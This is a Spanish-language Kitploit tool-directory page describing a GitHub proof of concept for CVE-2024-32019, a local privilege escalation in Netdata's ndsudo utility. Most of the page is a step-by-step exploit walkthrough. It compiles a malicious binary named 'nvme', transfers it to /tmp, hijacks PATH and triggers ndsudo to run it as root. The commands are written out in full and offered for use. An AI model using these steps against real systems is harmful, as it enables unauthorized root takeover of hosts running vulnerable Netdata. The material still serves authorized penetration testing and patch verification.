Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-32019-POC — PoC para la vulnerabilidad ndsudo de Netdata - CVE-2024-32019 | Kitploit
Herramientas/GitHubGitHub/azureadtrent/cve-2024-32019-poc
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónExplotación de Binarios
GitHubazureadtrent/cve-2024-32019-poc

CVE-2024-32019-POC

PoC para la vulnerabilidad ndsudo de Netdata - CVE-2024-32019

Ver Repositorio
212hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Escalada de Privilegios mediante ndsudo (Exploit Local de Netdata)

Este POC se utiliza para explotar una utilidad ndsudo vulnerable incluida con Netdata y escalar privilegios locales a root. El exploit funciona inyectando un binario malicioso en el PATH del usuario que se hace pasar por un comando de confianza (nvme) y es ejecutado con privilegios de root por ndsudo.


Prerrequisitos y Suposiciones

  • Tienes acceso local a la shell en el sistema objetivo.

  • Puedes ejecutar el siguiente comando pero falla con un error "no encontrado" o similar:

    root@kitploit:~
    ./ndsudo nvme-list
    

1. Compilar el Payload Malicioso

En tu máquina atacante (o en el sistema vulnerable si tiene un compilador), compila el binario (por ejemplo, desde el archivo poc.c en el repositorio):

root@kitploit:~
gcc poc.c -o nvme

Este binario debe estar diseñado para generar una shell de root o ejecutar comandos arbitrarios con privilegios de root.


2. Transferir el Payload al Sistema Objetivo

Mueve o sube el binario nvme compilado a un directorio escribible por tu usuario, como /tmp:

root@kitploit:~
scp nvme user@target:/tmp/
# or use any file upload method you have

3. Preparar el Payload para la Ejecución

En el sistema objetivo, asegúrate de que el binario sea ejecutable y antepón su directorio a tu PATH:

root@kitploit:~
chmod +x /tmp/nvme
export PATH=/tmp:$PATH

Esto asegura que ndsudo resolverá y ejecutará tu nvme malicioso en lugar del legítimo.


4. Ejecutar ndsudo para Ejecutar tu Payload

Ejecuta el comando vulnerable para activar ndsudo:

root@kitploit:~
./ndsudo nvme-list

Recursos

  • Aviso de Seguridad de Netdata en GitHub: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
Descargar herramienta